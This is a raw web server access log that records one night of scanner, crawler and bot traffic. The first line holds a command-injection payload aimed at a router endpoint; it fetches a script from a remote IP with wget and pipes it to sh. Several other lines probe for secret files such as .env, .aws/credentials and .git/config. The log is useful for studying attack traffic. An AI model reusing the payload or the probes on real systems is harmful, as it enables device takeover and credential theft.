185.224.128.67 - - [29/Nov/2024:01:01:37 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.215%2Ft%7Csh%3B%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
141.98.7.248 - - [29/Nov/2024:01:21:02 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
141.98.7.248 - - [29/Nov/2024:01:21:02 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
141.98.7.248 - - [29/Nov/2024:01:21:03 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
141.98.11.35 - - [29/Nov/2024:01:22:51 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
172.169.111.185 - - [29/Nov/2024:01:25:32 +0100] "MGLNDD_212.69.160.11_80" 400 383 "-" "-"
45.149.241.114 - - [29/Nov/2024:01:27:11 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 289 "-" "Links/0.9.1 (Linux 2.4.24; i386;)"
45.149.241.114 - - [29/Nov/2024:01:28:26 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G990E) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/17.0 Chrome/96.0.4664.104 Mobile Safari/537.36"
87.120.127.173 - - [29/Nov/2024:01:30:03 +0100] "GET /.env HTTP/1.1" 404 280 "-" "msnbot/1.0 ( http://search.msn.com/msnbot.htm)"
185.125.115.232 - - [29/Nov/2024:01:40:56 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
156.59.198.135 - - [29/Nov/2024:01:44:51 +0100] "GET /docs/contadino/2017/RE17-000029.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
167.94.138.117 - - [29/Nov/2024:02:05:03 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.138.117 - - [29/Nov/2024:02:05:08 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.117 - - [29/Nov/2024:02:05:09 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.117 - - [29/Nov/2024:02:05:11 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.117 - - [29/Nov/2024:02:05:12 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
156.59.198.135 - - [29/Nov/2024:02:14:28 +0100] "GET /renault.2web.at/stats/lang/awstats-lt.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.101.0.66 - - [29/Nov/2024:02:20:22 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
5.101.0.66 - - [29/Nov/2024:02:21:05 +0100] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
5.101.0.66 - - [29/Nov/2024:02:21:05 +0100] "GET /server-status HTTP/1.1" 403 286 "-" "Go-http-client/1.1"
5.101.0.66 - - [29/Nov/2024:02:21:05 +0100] "GET /aaa9 HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
5.101.0.66 - - [29/Nov/2024:02:21:05 +0100] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
5.101.0.66 - - [29/Nov/2024:02:21:05 +0100] "GET /aab9 HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
95.214.55.43 - - [29/Nov/2024:02:21:47 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [29/Nov/2024:02:50:10 +0100] "GET /renault.2web.at/stats/lang/awstats-al.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.220.40.210 - - [29/Nov/2024:02:51:52 +0100] "GET /.git/config HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0"
13.83.41.6 - - [29/Nov/2024:02:53:02 +0100] "GET /ReportServer HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.136 - - [29/Nov/2024:02:54:10 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009031403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Nov/2024:02:58:11 +0100] "GET /renault.2web.at/stats/lang/awstats-fr.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
74.82.47.5 - - [29/Nov/2024:02:59:27 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.136 - - [29/Nov/2024:03:02:11 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109071403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Nov/2024:03:06:11 +0100] "GET /docs/contadino/2017/RE17-000017.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Nov/2024:03:10:11 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image050.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Nov/2024:03:14:12 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010021403_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Nov/2024:03:18:11 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202007131303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
68.183.15.116 - - [29/Nov/2024:03:23:34 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
95.214.53.205 - - [29/Nov/2024:03:31:20 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
46.19.138.234 - - [29/Nov/2024:03:33:14 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [29/Nov/2024:03:36:56 +0100] "GET /docs/contadino/2017/RE17-000014.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Nov/2024:03:44:05 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109071603_RenOrder.xml HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Nov/2024:03:56:03 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202107291603_RenOrder.xml HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.36.224.90 - - [29/Nov/2024:03:56:35 +0100] "GET /backend/.env HTTP/1.1" 404 286 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1"
193.36.224.90 - - [29/Nov/2024:03:56:35 +0100] "GET /.aws/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
193.36.224.107 - - [29/Nov/2024:03:56:35 +0100] "GET /.aws/credentials HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
193.36.224.92 - - [29/Nov/2024:03:56:35 +0100] "GET /admin/.env HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
156.59.198.135 - - [29/Nov/2024:04:00:03 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001220903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
104.236.235.114 - - [29/Nov/2024:04:01:49 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
104.236.235.114 - - [29/Nov/2024:04:01:50 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://food-and-drink.vienna-lodgings.at/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
104.236.235.114 - - [29/Nov/2024:04:01:50 +0100] "GET /ads.txt HTTP/1.1" 404 296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
172.169.6.185 - - [29/Nov/2024:04:04:43 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.135 - - [29/Nov/2024:04:20:05 +0100] "GET /renault.2web.at/stats/lang/awstats-en.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
192.155.90.118 - - [29/Nov/2024:04:20:52 +0100] "\x16\x03\x01" 400 383 "-" "-"
194.50.16.198 - - [29/Nov/2024:04:25:33 +0100] "GET /login.asp HTTP/1.1" 404 354 "-" "-"
45.79.115.134 - - [29/Nov/2024:04:28:44 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
45.79.181.179 - - [29/Nov/2024:04:28:57 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.180.140.5 - - [29/Nov/2024:04:33:00 +0100] "GET /owncloud/status.php HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.140.107 - - [29/Nov/2024:04:33:00 +0100] "GET /status.php HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
82.147.84.87 - - [29/Nov/2024:04:40:46 +0100] "GET /w8f8Wy HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_7_3; es) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.7 Safari/605.1.15"
82.147.84.87 - - [29/Nov/2024:04:40:49 +0100] "GET /heapdump HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/618.31.14 (KHTML, like Gecko) Version/17.7 Safari/618.31.14"
82.147.84.87 - - [29/Nov/2024:04:40:51 +0100] "GET /actuator/heapdump HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/128.0 (x64 de)"
179.43.133.122 - - [29/Nov/2024:04:42:56 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [29/Nov/2024:04:49:22 +0100] "GET /docs/contadino/2017/RE17-000030.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.79 - - [29/Nov/2024:04:52:06 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [29/Nov/2024:04:53:23 +0100] "GET /docs/contadino/2017/RE17-000021.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Nov/2024:04:57:23 +0100] "GET /ed.activities.at/stats/lang/awstats-gr.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Nov/2024:05:01:23 +0100] "GET /docs/contadino/2018/ANGEBOT/AG18-00003.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
164.92.176.238 - - [29/Nov/2024:05:08:45 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
164.92.176.238 - - [29/Nov/2024:05:08:45 +0100] "GET /odinhttpcall1732848061 HTTP/1.1" 404 367 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.92.176.238 - - [29/Nov/2024:05:08:45 +0100] "POST /sdk HTTP/1.1" 404 348 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.92.176.238 - - [29/Nov/2024:05:08:45 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
164.92.176.238 - - [29/Nov/2024:05:08:45 +0100] "GET /HNAP1 HTTP/1.1" 404 350 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.92.176.238 - - [29/Nov/2024:05:08:45 +0100] "GET /evox/about HTTP/1.1" 404 355 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.92.176.238 - - [29/Nov/2024:05:08:45 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
164.92.176.238 - - [29/Nov/2024:05:08:45 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
161.35.194.25 - - [29/Nov/2024:05:08:45 +0100] "GET /solr/admin/info/system HTTP/1.1" 404 367 "-" "Go-http-client/1.1"
167.99.140.169 - - [29/Nov/2024:05:08:45 +0100] "GET /v2/_catalog HTTP/1.1" 404 356 "-" "Go-http-client/1.1"
138.68.109.70 - - [29/Nov/2024:05:08:45 +0100] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 366 "-" "Go-http-client/1.1"
157.230.114.190 - - [29/Nov/2024:05:08:45 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
167.172.98.72 - - [29/Nov/2024:05:08:45 +0100] "\x16\x03\x01" 400 383 "-" "-"
164.90.211.97 - - [29/Nov/2024:05:08:45 +0100] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 350 "-" "Go-http-client/1.1"
167.172.98.72 - - [29/Nov/2024:05:08:45 +0100] "\x16\x03\x01\x01$\x01" 400 383 "-" "-"
161.35.194.25 - - [29/Nov/2024:05:08:45 +0100] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 361 "-" "Go-http-client/1.1"
167.172.98.72 - - [29/Nov/2024:05:08:45 +0100] "\x16\x03\x01" 400 383 "-" "-"
167.172.98.72 - - [29/Nov/2024:05:08:45 +0100] "\x16\x03\x01" 400 383 "-" "-"
178.215.236.240 - - [29/Nov/2024:05:11:29 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Links (2.1pre15; FreeBSD 5.3-RELEASE i386; 196x84)"
114.33.209.132 - - [29/Nov/2024:05:13:16 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
109.194.243.115 - - [29/Nov/2024:05:13:50 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
142.93.171.183 - - [29/Nov/2024:05:14:05 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
142.93.171.183 - - [29/Nov/2024:05:14:05 +0100] "POST /sdk HTTP/1.1" 404 348 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
142.93.171.183 - - [29/Nov/2024:05:14:05 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
142.93.171.183 - - [29/Nov/2024:05:14:05 +0100] "GET /odinhttpcall1732848381 HTTP/1.1" 404 367 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
142.93.171.183 - - [29/Nov/2024:05:14:05 +0100] "GET /evox/about HTTP/1.1" 404 355 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
142.93.171.183 - - [29/Nov/2024:05:14:05 +0100] "GET /HNAP1 HTTP/1.1" 404 350 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
142.93.171.183 - - [29/Nov/2024:05:14:05 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
142.93.171.183 - - [29/Nov/2024:05:14:05 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
164.90.211.97 - - [29/Nov/2024:05:14:06 +0100] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 350 "-" "Go-http-client/1.1"
138.68.109.70 - - [29/Nov/2024:05:14:06 +0100] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 366 "-" "Go-http-client/1.1"
167.172.98.72 - - [29/Nov/2024:05:14:06 +0100] "\x16\x03\x01" 400 383 "-" "-"
161.35.194.25 - - [29/Nov/2024:05:14:06 +0100] "GET /solr/admin/info/system HTTP/1.1" 404 367 "-" "Go-http-client/1.1"
167.99.140.169 - - [29/Nov/2024:05:14:06 +0100] "GET /v2/_catalog HTTP/1.1" 404 356 "-" "Go-http-client/1.1"
157.230.114.190 - - [29/Nov/2024:05:14:06 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
167.172.98.72 - - [29/Nov/2024:05:14:06 +0100] "\x16\x03\x01\x01$\x01" 400 383 "-" "-"
167.172.98.72 - - [29/Nov/2024:05:14:06 +0100] "\x16\x03\x01" 400 383 "-" "-"
161.35.194.25 - - [29/Nov/2024:05:14:06 +0100] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 361 "-" "Go-http-client/1.1"
167.172.98.72 - - [29/Nov/2024:05:14:06 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.135 - - [29/Nov/2024:05:15:10 +0100] "GET /ed.activities.at/stats/lang/awstats-ro.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
82.147.84.87 - - [29/Nov/2024:05:16:21 +0100] "GET /w8f8Wy HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
82.147.84.87 - - [29/Nov/2024:05:16:23 +0100] "GET /heapdump HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
82.147.84.87 - - [29/Nov/2024:05:16:23 +0100] "GET /actuator/heapdump HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 6.2; rv:128.0 ) Gecko/20100101 Firefox/128.0"
194.50.16.198 - - [29/Nov/2024:05:23:09 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
173.252.83.8 - - [29/Nov/2024:05:26:59 +0100] "GET /robots.txt HTTP/1.1" 404 366 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
173.252.83.24 - - [29/Nov/2024:05:28:14 +0100] "GET /download/file.php?avatar=112_1343242967.jpg HTTP/1.1" 404 373 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
82.147.84.87 - - [29/Nov/2024:05:39:24 +0100] "GET /w8f8Wy HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.27"
82.147.84.87 - - [29/Nov/2024:05:39:28 +0100] "GET /heapdump HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0"
82.147.84.87 - - [29/Nov/2024:05:39:29 +0100] "GET /actuator/heapdump HTTP/1.1" 404 294 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0"
156.59.198.135 - - [29/Nov/2024:05:41:08 +0100] "GET /docs/contadino/2017/RE17-000027.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Nov/2024:05:45:09 +0100] "GET /docs/contadino/2018/ANGEBOT/AG18-00004.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.23.108.183 - - [29/Nov/2024:05:50:49 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0"
156.59.198.135 - - [29/Nov/2024:06:05:11 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001231303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Nov/2024:06:09:11 +0100] "GET /docs/contadino/2017/RE17-000028.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
82.147.84.87 - - [29/Nov/2024:06:10:09 +0100] "GET /w8f8Wy HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0"
82.147.84.87 - - [29/Nov/2024:06:10:13 +0100] "GET /heapdump HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0"
82.147.84.87 - - [29/Nov/2024:06:10:15 +0100] "GET /actuator/heapdump HTTP/1.1" 404 295 "-" "Mozilla/5.0 (SS; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
156.59.198.136 - - [29/Nov/2024:06:13:12 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911071803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.35 - - [29/Nov/2024:06:14:23 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [29/Nov/2024:06:17:12 +0100] "GET /ed.activities.at/stats/lang/awstats-fi.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Nov/2024:06:21:12 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201912061603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.27.12 - - [29/Nov/2024:06:25:12 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.50.76 - - [29/Nov/2024:06:29:12 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.45.54 - - [29/Nov/2024:06:33:13 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.253.160.152 - - [29/Nov/2024:06:33:23 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
47.128.22.153 - - [29/Nov/2024:06:37:13 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Nov/2024:06:45:37 +0100] "GET /ed.activities.at/stats/lang/awstats-tw.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.79.154.75 - - [29/Nov/2024:06:46:51 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
178.79.154.75 - - [29/Nov/2024:06:46:51 +0100] "\x16\x03\x01" 400 383 "-" "-"
178.79.154.75 - - [29/Nov/2024:06:46:51 +0100] "\x16\x03\x01" 400 383 "-" "-"
178.79.154.75 - - [29/Nov/2024:06:46:51 +0100] "\x16\x03\x01" 400 383 "-" "-"
